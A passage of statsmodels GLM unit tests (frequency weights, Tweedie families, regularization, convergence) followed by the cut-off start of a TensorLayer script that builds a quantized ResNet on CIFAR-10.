        gid = np.arange(1, len(cls.endog) + 1) // 2
        fit_kwds = dict(cov_type='cluster',
                        cov_kwds={'groups': gid, 'use_correction': False})

        import warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                           family=sm.families.Poisson()).fit(**fit_kwds)
            # The duplicated data needs its group labels repeated the same way.
            gidr = np.repeat(gid, cls.weight)
            fit_kwds = dict(cov_type='cluster',
                            cov_kwds={'groups': gidr, 'use_correction': False})
            cls.res2 = GLM(cls.endog_big, cls.exog_big,
                           family=sm.families.Poisson()).fit(
                               start_params=start_params, **fit_kwds)
class TestWtdGlmBinomial(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Binomial family with canonical logit link."""
        super(TestWtdGlmBinomial, cls).setup_class()
        # Scale the count response into [0, 1] proportions for Binomial.
        cls.endog = cls.endog / 100
        cls.endog_big = cls.endog_big / 100
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=sm.families.Binomial()).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=sm.families.Binomial()).fit()
class TestWtdGlmNegativeBinomial(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Negative Binomial family, canonical link g(p) = log(p/(p + 1/alpha))."""
        super(TestWtdGlmNegativeBinomial, cls).setup_class()
        alpha = 1.
        with warnings.catch_warnings():
            # The nbinom link triggers a DomainWarning for this family.
            warnings.simplefilter("ignore", category=DomainWarning)
            nb_family = sm.families.NegativeBinomial(
                link=sm.families.links.nbinom(alpha=alpha),
                alpha=alpha)
            cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                           family=nb_family).fit()
            cls.res2 = GLM(cls.endog_big, cls.exog_big,
                           family=nb_family).fit()
class TestWtdGlmGamma(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Gamma family with log link."""
        super(TestWtdGlmGamma, cls).setup_class()
        gamma_log = sm.families.Gamma(sm.families.links.log())
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=gamma_log).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=gamma_log).fit()
class TestWtdGlmGaussian(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Gaussian family with log link."""
        super(TestWtdGlmGaussian, cls).setup_class()
        gauss_log = sm.families.Gaussian(sm.families.links.log())
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=gauss_log).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=gauss_log).fit()
class TestWtdGlmInverseGaussian(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """InverseGaussian family with log link."""
        super(TestWtdGlmInverseGaussian, cls).setup_class()
        ig_log = sm.families.InverseGaussian(sm.families.links.log())
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=ig_log).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=ig_log).fit()
class TestWtdGlmGammaNewton(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Gamma family with log link, fit with the Newton optimizer.

        Bug fix: ``method='newton'`` was previously passed to the ``GLM``
        constructor, where it is not a model argument and was silently
        ignored; the optimizer choice belongs to ``fit``.
        """
        super(TestWtdGlmGammaNewton, cls).setup_class()
        family_link = sm.families.Gamma(sm.families.links.log())
        cls.res1 = GLM(cls.endog, cls.exog,
                       freq_weights=cls.weight,
                       family=family_link).fit(method='newton')
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=family_link).fit(method='newton')
class TestWtdGlmGammaScale_X2(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Gamma family with log link, Pearson-X2 scale estimate.

        Bug fix: ``scale='X2'`` was previously passed to the ``GLM``
        constructor, where it is not a model argument and was silently
        ignored; the scale option belongs to ``fit``.
        """
        super(TestWtdGlmGammaScale_X2, cls).setup_class()
        family_link = sm.families.Gamma(sm.families.links.log())
        cls.res1 = GLM(cls.endog, cls.exog,
                       freq_weights=cls.weight,
                       family=family_link).fit(scale='X2')
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=family_link).fit(scale='X2')
class TestWtdGlmGammaScale_dev(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Gamma family with log link, deviance-based scale estimate.

        Bug fix: ``scale='dev'`` was previously passed to the ``GLM``
        constructor, where it is not a model argument and was silently
        ignored; the scale option belongs to ``fit``.
        """
        super(TestWtdGlmGammaScale_dev, cls).setup_class()
        family_link = sm.families.Gamma(sm.families.links.log())
        cls.res1 = GLM(cls.endog, cls.exog,
                       freq_weights=cls.weight,
                       family=family_link).fit(scale='dev')
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=family_link).fit(scale='dev')

    def test_missing(self):
        """freq_weights must be trimmed consistently with missing='drop'."""
        endog = self.data.endog.copy()
        exog = self.data.exog.copy()
        exog[0, 0] = np.nan
        endog[[2, 4, 6, 8]] = np.nan
        freq_weights = self.weight
        mod_missing = GLM(endog, exog, family=self.res1.model.family,
                          freq_weights=freq_weights, missing='drop')
        assert_equal(mod_missing.freq_weights.shape[0],
                     mod_missing.endog.shape[0])
        assert_equal(mod_missing.freq_weights.shape[0],
                     mod_missing.exog.shape[0])
        # Rows 0, 2, 4, 6, 8 carry NaNs; the remaining 12 rows survive.
        keep_idx = np.array([1, 3, 5, 7, 9, 10, 11, 12, 13, 14, 15, 16])
        assert_equal(mod_missing.freq_weights, self.weight[keep_idx])
class TestWtdTweedieLog(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Tweedie family with log link and var_power=1."""
        super(TestWtdTweedieLog, cls).setup_class()
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=1)
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=tweedie).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=tweedie).fit()
class TestWtdTweediePower2(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Tweedie family with Power(1) link and var_power=2.

        Builds its own (pandas) data instead of calling the mixin's
        setup_class, restricting exog to INCOME and SOUTH.
        """
        cls.data = cpunish.load_pandas()
        cls.endog = cls.data.endog
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        np.random.seed(1234)
        cls.weight = np.random.randint(5, 100, len(cls.endog))
        # Row-duplicated version of the data, equivalent to freq_weights.
        cls.endog_big = np.repeat(cls.endog.values, cls.weight)
        cls.exog_big = np.repeat(cls.exog.values, cls.weight, axis=0)
        tweedie = sm.families.Tweedie(link=sm.families.links.Power(),
                                      var_power=2)
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=tweedie).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=tweedie).fit()
class TestWtdTweediePower15(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Tweedie family with Power(0.5) link and var_power=1.5."""
        super(TestWtdTweediePower15, cls).setup_class()
        tweedie = sm.families.Tweedie(link=sm.families.links.Power(0.5),
                                      var_power=1.5)
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=tweedie).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=tweedie).fit()
def test_wtd_patsy_missing():
    """freq_weights must line up with rows kept after patsy drops NaNs."""
    import pandas as pd
    data = cpunish.load(as_pandas=False)
    # Poke NaNs into one exog row and four endog rows.
    data.exog[0, 0] = np.nan
    data.endog[[2, 4, 6, 8]] = np.nan
    data.pandas = pd.DataFrame(data.exog, columns=data.exog_name)
    data.pandas['EXECUTIONS'] = data.endog
    weights = np.arange(1, len(data.endog)+1)
    formula = """EXECUTIONS ~ INCOME + PERPOVERTY + PERBLACK + VC100k96 +
                 SOUTH + DEGREE"""
    mod_missing = GLM.from_formula(formula, data=data.pandas,
                                   freq_weights=weights)
    assert_equal(mod_missing.freq_weights.shape[0],
                 mod_missing.endog.shape[0])
    assert_equal(mod_missing.freq_weights.shape[0],
                 mod_missing.exog.shape[0])
    # 17 rows minus the 5 containing NaNs leaves 12.
    assert_equal(mod_missing.freq_weights.shape[0], 12)
    keep_weights = np.array([2, 4, 6, 8, 10, 11, 12, 13, 14, 15, 16, 17])
    assert_equal(mod_missing.freq_weights, keep_weights)
class CheckTweedie(object):
    """Compare a Tweedie fit (res1) against stored reference results (res2)."""

    def test_resid(self):
        # Compare the first 17 residuals plus the final one of each type.
        idx1 = len(self.res1.resid_response) - 1
        idx2 = len(self.res2.resid_response) - 1
        assert_allclose(np.concatenate((self.res1.resid_response[:17],
                                        [self.res1.resid_response[idx1]])),
                        np.concatenate((self.res2.resid_response[:17],
                                        [self.res2.resid_response[idx2]])),
                        rtol=1e-5, atol=1e-5)
        assert_allclose(np.concatenate((self.res1.resid_pearson[:17],
                                        [self.res1.resid_pearson[idx1]])),
                        np.concatenate((self.res2.resid_pearson[:17],
                                        [self.res2.resid_pearson[idx2]])),
                        rtol=1e-5, atol=1e-5)
        assert_allclose(np.concatenate((self.res1.resid_deviance[:17],
                                        [self.res1.resid_deviance[idx1]])),
                        np.concatenate((self.res2.resid_deviance[:17],
                                        [self.res2.resid_deviance[idx2]])),
                        rtol=1e-5, atol=1e-5)
        assert_allclose(np.concatenate((self.res1.resid_working[:17],
                                        [self.res1.resid_working[idx1]])),
                        np.concatenate((self.res2.resid_working[:17],
                                        [self.res2.resid_working[idx2]])),
                        rtol=1e-5, atol=1e-5)

    def test_bse(self):
        # Bug fix: rtol was 1e6 (a million-fold relative tolerance), which
        # made this check vacuous; 1e-6 was clearly intended.
        assert_allclose(self.res1.bse, self.res2.bse, atol=1e-6, rtol=1e-6)

    def test_params(self):
        assert_allclose(self.res1.params, self.res2.params, atol=1e-5,
                        rtol=1e-5)

    def test_deviance(self):
        assert_allclose(self.res1.deviance, self.res2.deviance, atol=1e-6,
                        rtol=1e-6)

    def test_df(self):
        assert_equal(self.res1.df_model, self.res2.df_model)
        assert_equal(self.res1.df_resid, self.res2.df_resid)

    def test_fittedvalues(self):
        idx1 = len(self.res1.fittedvalues) - 1
        # Bug fix: idx2 was previously derived from len(resid_response);
        # use the length of the array actually being indexed.
        idx2 = len(self.res2.fittedvalues) - 1
        assert_allclose(np.concatenate((self.res1.fittedvalues[:17],
                                        [self.res1.fittedvalues[idx1]])),
                        np.concatenate((self.res2.fittedvalues[:17],
                                        [self.res2.fittedvalues[idx2]])),
                        atol=1e-4, rtol=1e-4)

    def test_summary(self):
        # Smoke test: both summary flavors must build without error.
        self.res1.summary()
        self.res1.summary2()
class TestTweediePower15(CheckTweedie):
    @classmethod
    def setup_class(cls):
        """Tweedie var_power=1.5 with Power(1) link vs. stored results."""
        from .results.results_glm import CpunishTweediePower15
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        tweedie = sm.families.Tweedie(link=sm.families.links.Power(1),
                                      var_power=1.5)
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
        cls.res2 = CpunishTweediePower15()
class TestTweediePower2(CheckTweedie):
    @classmethod
    def setup_class(cls):
        """Tweedie var_power=2 with Power(1) link vs. stored results."""
        from .results.results_glm import CpunishTweediePower2
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        tweedie = sm.families.Tweedie(link=sm.families.links.Power(1),
                                      var_power=2.)
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
        cls.res2 = CpunishTweediePower2()
class TestTweedieLog1(CheckTweedie):
    @classmethod
    def setup_class(cls):
        """Tweedie var_power=1 with log link vs. stored results."""
        from .results.results_glm import CpunishTweedieLog1
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=1.)
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
        cls.res2 = CpunishTweedieLog1()
class TestTweedieLog15Fair(CheckTweedie):
    @classmethod
    def setup_class(cls):
        """Tweedie var_power=1.5, log link, on the fair dataset."""
        from .results.results_glm import FairTweedieLog15
        from statsmodels.datasets.fair import load_pandas
        data = load_pandas()
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=1.5)
        cls.res1 = sm.GLM(endog=data.endog,
                          exog=data.exog[['rate_marriage', 'age',
                                          'yrs_married']],
                          family=tweedie).fit()
        cls.res2 = FairTweedieLog15()
class CheckTweedieSpecial(object):
    """Tweedie at special var_power values must match the equivalent family."""

    def test_mu(self):
        assert_allclose(self.res1.mu, self.res2.mu, rtol=1e-5, atol=1e-5)

    def test_resid(self):
        # All residual flavors must agree between the two fits.
        tol = dict(rtol=1e-5, atol=1e-5)
        assert_allclose(self.res1.resid_response,
                        self.res2.resid_response, **tol)
        assert_allclose(self.res1.resid_pearson,
                        self.res2.resid_pearson, **tol)
        assert_allclose(self.res1.resid_deviance,
                        self.res2.resid_deviance, **tol)
        assert_allclose(self.res1.resid_working,
                        self.res2.resid_working, **tol)
        assert_allclose(self.res1.resid_anscombe_unscaled,
                        self.res2.resid_anscombe_unscaled, **tol)
class TestTweedieSpecialLog0(CheckTweedieSpecial):
    @classmethod
    def setup_class(cls):
        """Tweedie(var_power=0) should reproduce Gaussian, both with log link."""
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        gauss = sm.families.Gaussian(link=sm.families.links.log())
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=gauss).fit()
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=0)
        cls.res2 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
class TestTweedieSpecialLog1(CheckTweedieSpecial):
    @classmethod
    def setup_class(cls):
        """Tweedie(var_power=1) should reproduce Poisson, both with log link."""
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        poisson = sm.families.Poisson(link=sm.families.links.log())
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=poisson).fit()
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=1)
        cls.res2 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
class TestTweedieSpecialLog2(CheckTweedieSpecial):
    @classmethod
    def setup_class(cls):
        """Tweedie(var_power=2) should reproduce Gamma, both with log link."""
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        gamma = sm.families.Gamma(link=sm.families.links.log())
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=gamma).fit()
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=2)
        cls.res2 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
class TestTweedieSpecialLog3(CheckTweedieSpecial):
    @classmethod
    def setup_class(cls):
        """Tweedie(var_power=3) should reproduce InverseGaussian, log link."""
        cls.data = cpunish.load_pandas()
        cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
        cls.endog = cls.data.endog
        invgauss = sm.families.InverseGaussian(link=sm.families.links.log())
        cls.res1 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=invgauss).fit()
        tweedie = sm.families.Tweedie(link=sm.families.links.log(),
                                      var_power=3)
        cls.res2 = sm.GLM(endog=cls.endog, exog=cls.exog,
                          family=tweedie).fit()
@pytest.mark.filterwarnings("ignore:GLM ridge optimization")
def test_tweedie_EQL():
    """Tweedie EQL: regression tests for plain, lasso and ridge fits.

    The stored values are regression results, but they sit very close to
    the population parameters.
    """
    np.random.seed(3242)
    n = 500
    p = 1.5  # Tweedie variance power
    x = np.random.normal(size=(n, 4))
    lpr = np.dot(x, np.r_[1, -1, 0, 0.5])
    mu = np.exp(lpr)

    # Generate Tweedie values via the compound Poisson-gamma representation.
    lam = 10 * mu**(2 - p) / (2 - p)
    alp = (2 - p) / (p - 1)
    bet = 10 * mu**(1 - p) / (p - 1)
    y = np.empty(n)
    N = np.random.poisson(lam)
    for i in range(n):
        y[i] = np.random.gamma(alp, 1 / bet[i], N[i]).sum()

    fam = sm.families.Tweedie(var_power=p, eql=True)

    # Un-regularized fit using gradients, not IRLS.
    result1 = sm.GLM(y, x, family=fam).fit(method="newton")
    assert_allclose(result1.params,
                    np.array([1.00350497, -0.99656954, 0.00802702, 0.50713209]),
                    rtol=1e-5, atol=1e-5)

    # Lasso fit using coordinate-wise descent.
    # TODO: The search gets trapped in an infinite oscillation, so use
    # a slack convergence tolerance.
    result2 = sm.GLM(y, x, family=fam).fit_regularized(
        L1_wt=1, alpha=0.07, maxiter=200, cnvrg_tol=0.01)

    rtol, atol = 1e-2, 1e-4
    assert_allclose(result2.params,
                    np.array([1.00281192, -0.99182638, 0., 0.50448516]),
                    rtol=rtol, atol=atol)

    # Series of ridge fits using gradients.
    ev = (np.array([1.001778, -0.99388, 0.00797, 0.506183]),
          np.array([0.985841, -0.969124, 0.007319, 0.497649]),
          np.array([0.206429, -0.164547, 0.000235, 0.102489]))
    for j, alpha in enumerate([0.05, 0.5, 0.7]):
        model3 = sm.GLM(y, x, family=fam)
        result3 = model3.fit_regularized(L1_wt=0, alpha=alpha)
        assert_allclose(result3.params, ev[j], rtol=rtol, atol=atol)
        # A vector of equal penalty weights must reproduce the scalar fit.
        result4 = model3.fit_regularized(L1_wt=0,
                                         alpha=alpha * np.ones(x.shape[1]))
        assert_allclose(result4.params, result3.params, rtol=rtol, atol=atol)
        # Unpenalizing one coefficient must change the solution.
        alpha = alpha * np.ones(x.shape[1])
        alpha[0] = 0
        result5 = model3.fit_regularized(L1_wt=0, alpha=alpha)
        assert not np.allclose(result5.params, result4.params, rtol=rtol,
                               atol=atol)
def test_tweedie_EQL_poisson_limit():
    """Tweedie EQL with var_power=1 must reproduce a Poisson GLM fit."""
    # RNG draw order (seed, exog, endog) kept identical to the original.
    np.random.seed(3242)
    nobs = 500
    exog = np.random.normal(size=(nobs, 3))
    exog[:, 0] = 1
    linpred = 4 + exog[:, 1:].sum(1)
    endog = np.random.poisson(np.exp(linpred))

    tweedie_fam = sm.families.Tweedie(var_power=1, eql=True)
    for scale in 1.0, 'x2', 'dev':
        # Un-regularized fit using gradients, not IRLS.
        res_tweedie = sm.GLM(endog, exog, family=tweedie_fam).fit(
            method="newton", scale=scale)
        # Reference: an ordinary Poisson GLM with identical scale handling.
        res_poisson = sm.GLM(endog, exog, family=sm.families.Poisson()).fit(
            method="newton", scale=scale)
        assert_allclose(res_tweedie.params, res_poisson.params,
                        atol=1e-6, rtol=1e-6)
        assert_allclose(res_tweedie.bse, res_poisson.bse, 1e-6, 1e-6)
def test_tweedie_EQL_upper_limit():
    """Limiting Tweedie EQL case with var = mean**2 (var_power=2).

    Checked against population values, so the accuracy demanded is low.
    """
    np.random.seed(3242)
    nobs = 500
    exog = np.random.normal(size=(nobs, 3))
    exog[:, 0] = 1
    endog = np.random.poisson(np.exp(4 + exog[:, 1:].sum(1)))

    fam = sm.families.Tweedie(var_power=2, eql=True)
    for scale in 'x2', 'dev', 1.0:
        # Un-regularized fit using gradients, not IRLS.
        result = sm.GLM(endog, exog, family=fam).fit(method="newton",
                                                     scale=scale)
        assert_allclose(result.params, np.r_[4, 1, 1], atol=1e-3, rtol=1e-1)
def testTweediePowerEstimate():
    """Test the Pearson estimate of the Tweedie variance and scale parameters.

    The estimated variance power should agree with the slope from an auxiliary
    Gamma regression of squared residuals on log(fitted mean).
    """
    # Ideally, this would match the following R code, but I cannot make it work...
    #
    # setwd('c:/workspace')
    # data <- read.csv('cpunish.csv', sep=",")
    #
    # library(tweedie)
    #
    # y <- c(1.00113835e+05, 6.89668315e+03, 6.15726842e+03,
    #        1.41718806e+03, 5.11776456e+02, 2.55369154e+02,
    #        1.07147443e+01, 3.56874698e+00, 4.06797842e-02,
    #        7.06996731e-05, 2.10165106e-07, 4.34276938e-08,
    #        1.56354040e-09, 0.00000000e+00, 0.00000000e+00,
    #        0.00000000e+00, 0.00000000e+00)
    #
    # data$NewY <- y
    #
    # out <- tweedie.profile( NewY ~ INCOME + SOUTH - 1,
    #                         p.vec=c(1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8,
    #                                 1.9), link.power=0,
    #                         data=data,do.plot = TRUE)
    data = cpunish.load_pandas()
    y = [1.00113835e+05, 6.89668315e+03, 6.15726842e+03,
         1.41718806e+03, 5.11776456e+02, 2.55369154e+02,
         1.07147443e+01, 3.56874698e+00, 4.06797842e-02,
         7.06996731e-05, 2.10165106e-07, 4.34276938e-08,
         1.56354040e-09, 0.00000000e+00, 0.00000000e+00,
         0.00000000e+00, 0.00000000e+00]

    model1 = sm.GLM(y, data.exog[['INCOME', 'SOUTH']],
                    family=sm.families.Tweedie(link=sm.families.links.log(),
                                               var_power=1.5))
    res1 = model1.fit()
    # Auxiliary regression: squared residuals modeled as Gamma with a
    # log link in log(mu); the slope estimates the variance power.
    model2 = sm.GLM((y - res1.mu) ** 2,
                    np.column_stack((np.ones(len(res1.mu)), np.log(res1.mu))),
                    family=sm.families.Gamma(sm.families.links.log()))
    res2 = model2.fit()
    # Sample may be too small for this...
    # assert_allclose(res1.scale, np.exp(res2.params[0]), rtol=0.25)
    p = model1.estimate_tweedie_power(res1.mu)
    assert_allclose(p, res2.params[1], rtol=0.25)
def test_glm_lasso_6431():
    """Regression test for GH#6431: regularized fits with alpha=0.

    Fails with newton-cg as optimizer.
    """
    np.random.seed(123)
    from statsmodels.regression.linear_model import OLS

    nobs = 50
    exog = np.ones((nobs, 2))
    exog[:, 1] = np.arange(0, nobs)
    endog = 1000 + exog[:, 1] + np.random.normal(0, 1, nobs)

    expected = np.r_[999.82244338, 1.0077889]

    for method in "bfgs", None:
        for model_cls in [OLS, GLM]:
            # An L1 weight of exactly 0 uses scipy gradient optimization;
            # a tiny positive value (1e-9) switches to the statsmodels
            # coordinate-descent path.
            for l1_wt in [0, 1e-9]:
                model = model_cls(endog, exog)
                if model_cls == OLS:
                    fit = model.fit_regularized(alpha=0, L1_wt=l1_wt)
                else:
                    fit = model._fit_ridge(alpha=0, start_params=None,
                                           method=method)
                assert_allclose(expected, fit.params, atol=1e-6, rtol=1e-6)
class TestRegularized(object):
    """Compare fit_regularized against stored elastic-net results from R glmnet."""

    def test_regularized(self):
        import os
        from .results import glmnet_r_results

        # Each CSV holds endog in column 0 and exog in the remaining columns.
        for dtype in "binomial", "poisson":
            cur_dir = os.path.dirname(os.path.abspath(__file__))
            data = np.loadtxt(os.path.join(cur_dir, "results", "enet_%s.csv" % dtype),
                              delimiter=",")
            endog = data[:, 0]
            exog = data[:, 1:]

            fam = {"binomial": sm.families.Binomial,
                   "poisson": sm.families.Poisson}[dtype]

            # Nine stored glmnet fits per family, each packed as
            # (L1_wt, alpha, params...).
            for j in range(9):
                vn = "rslt_%s_%d" % (dtype, j)
                r_result = getattr(glmnet_r_results, vn)
                L1_wt = r_result[0]
                alpha = r_result[1]
                params = r_result[2:]
                model = GLM(endog, exog, family=fam())
                sm_result = model.fit_regularized(L1_wt=L1_wt, alpha=alpha)
                # Agreement is OK, see below for further check
                assert_allclose(params, sm_result.params, atol=1e-2, rtol=0.3)

                # The penalized log-likelihood that we are maximizing.
                def plf(params):
                    llf = model.loglike(params) / len(endog)
                    llf = llf - alpha * ((1 - L1_wt) * np.sum(params**2) / 2
                                         + L1_wt * np.sum(np.abs(params)))
                    return llf

                # Confirm that we are doing better than glmnet.
                llf_r = plf(params)
                llf_sm = plf(sm_result.params)
                assert_equal(np.sign(llf_sm - llf_r), 1)
class TestConvergence(object):
    """Check that GLM.fit stops at the iteration where atol/rtol is first met.

    Uses the Binomial family with the canonical logit link on the star98
    dataset.  Each test fits with a tolerance configuration, then replays the
    fit history to find the first iteration at which two consecutive values of
    the convergence criterion agree within tolerance, and asserts that this
    matches the iteration count reported by the fit.
    """

    @classmethod
    def setup_class(cls):
        '''
        Test Binomial family with canonical logit link using star98 dataset.
        '''
        from statsmodels.datasets.star98 import load
        data = load(as_pandas=False)
        data.exog = add_constant(data.exog, prepend=False)
        cls.model = GLM(data.endog, data.exog,
                        family=sm.families.Binomial())

    def _when_converged(self, atol=1e-8, rtol=0, tol_criterion='deviance'):
        """Return the first index where consecutive history values converge.

        Bug fix: the original iterated over the full history while indexing
        ``[i + 1]``, which raised IndexError on the last element (instead of
        the intended ValueError) whenever convergence was never reached.
        Stop at the penultimate element instead.
        """
        history = self.res.fit_history[tol_criterion]
        for i in range(len(history) - 1):
            if np.allclose(history[i], history[i + 1], atol=atol, rtol=rtol):
                return i
        raise ValueError("CONVERGENCE CHECK: It seems this doesn't converge!")

    def _check_convergence(self, atol, rtol, tol_criterion='deviance'):
        """Shared body of the six convergence tests (fit, replay, compare)."""
        self.res = self.model.fit(atol=atol, rtol=rtol,
                                  tol_criterion=tol_criterion)
        expected_iterations = self._when_converged(
            atol=atol, rtol=rtol, tol_criterion=tol_criterion)
        actual_iterations = self.res.fit_history['iteration']
        # Note the first value in the list is np.inf. The second value
        # is the initial guess based off of start_params or the
        # estimate thereof. The third value (index = 2) is the actual "first
        # iteration".
        assert_equal(expected_iterations, actual_iterations)
        assert_equal(len(self.res.fit_history['deviance']) - 2,
                     actual_iterations)

    def test_convergence_atol_only(self):
        self._check_convergence(atol=1e-8, rtol=0)

    def test_convergence_rtol_only(self):
        self._check_convergence(atol=0, rtol=1e-8)

    def test_convergence_atol_rtol(self):
        self._check_convergence(atol=1e-8, rtol=1e-8)

    def test_convergence_atol_only_params(self):
        self._check_convergence(atol=1e-8, rtol=0, tol_criterion='params')

    def test_convergence_rtol_only_params(self):
        self._check_convergence(atol=0, rtol=1e-8, tol_criterion='params')

    def test_convergence_atol_rtol_params(self):
        self._check_convergence(atol=1e-8, rtol=1e-8, tol_criterion='params')
def test_poisson_deviance():
    """Check Poisson deviance identities (see GH#3355).

    The deviance must equal both the sum of squared deviance residuals and
    twice the log-likelihood ratio against the saturated model, including the
    no-constant case where ``resid_response.sum() != 0`` (the missing term
    reported in #3355).
    """
    np.random.seed(123987)
    nobs, k_vars = 50, 3 - 1
    x = sm.add_constant(np.random.randn(nobs, k_vars))

    mu_true = np.exp(x.sum(1))
    y = np.random.poisson(mu_true, size=nobs)

    mod = sm.GLM(y, x[:, :], family=sm.genmod.families.Poisson())
    res = mod.fit()

    d_i = res.resid_deviance
    d = res.deviance
    # Saturated model uses y itself as fitted values (1e-20 guards log(0)).
    lr = (mod.family.loglike(y, y + 1e-20) -
          mod.family.loglike(y, res.fittedvalues)) * 2

    assert_allclose(d, (d_i**2).sum(), rtol=1e-12)
    assert_allclose(d, lr, rtol=1e-12)

    # case without constant, resid_response.sum() != 0
    mod_nc = sm.GLM(y, x[:, 1:], family=sm.genmod.families.Poisson())
    res_nc = mod_nc.fit()

    d_i = res_nc.resid_deviance
    d = res_nc.deviance
    # Fix: use mod_nc's own family here.  The original reused ``mod.family``,
    # which is numerically identical (both Poisson) but a copy-paste slip.
    lr = (mod_nc.family.loglike(y, y + 1e-20) -
          mod_nc.family.loglike(y, res_nc.fittedvalues)) * 2

    assert_allclose(d, (d_i**2).sum(), rtol=1e-12)
    assert_allclose(d, lr, rtol=1e-12)
def test_non_invertible_hessian_fails_summary():
    """summary() must remain available when the Hessian cannot be inverted."""
    data = cpunish.load_pandas()
    # A constant endog makes the Gamma fit degenerate on purpose.
    data.endog[:] = 1
    with warnings.catch_warnings():
        # We filter DomainWarning, the convergence problems and
        # warnings emitted inside summary().
        warnings.simplefilter("ignore")
        model = sm.GLM(data.endog, data.exog, family=sm.families.Gamma())
        result = model.fit(maxiter=1, method='bfgs', max_start_irls=0)
        result.summary()
|
<filename>tensorlayer/exp/exper_resnet.py
#! /usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
import tensorlayer as tl
# Quantization bit widths for weights (bitW) and activations (bitA).
bitW = 8
bitA = 8

tf.logging.set_verbosity(tf.logging.DEBUG)
tl.logging.set_verbosity(tl.logging.DEBUG)

sess = tf.InteractiveSession()

# CIFAR-10 as NHWC arrays; labels are integer class ids.
X_train, y_train, X_test, y_test = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3), plotable=False)
def block(net, out_c, stride, reuse, is_train, bitW, bitA, name):
    """Residual block built from two quantized 3x3 conv+BN layers.

    NOTE(review): there is no projection on the shortcut path, so
    ``net += residual`` can only be shape-compatible when ``stride == 1`` and
    ``out_c`` equals the input channel count.  resnet18 below calls this with
    stride=2 and a channel increase (e.g. res_block2_1: 64 -> 128), which
    looks like it would fail with a shape mismatch -- confirm against the
    TensorLayer version in use.  Also note ``net`` is a TensorLayer Layer
    here; ``+=`` and ``tf.nn.relu`` applied to it rely on operator support
    that may not exist in all TL releases.
    """
    with tf.variable_scope(name, reuse=reuse):
        residual = net
        # First conv carries the stride; the second keeps the resolution.
        net = tl.layers.QuanConv2dWithBN(net, out_c, (3,3), (stride,stride), padding='SAME', act=tf.nn.relu, is_train=is_train, bitW=bitW, bitA=bitA)
        net = tl.layers.QuanConv2dWithBN(net, out_c, (3,3), (1,1), padding='SAME', act=None, is_train=is_train, bitW=bitW, bitA=bitA)
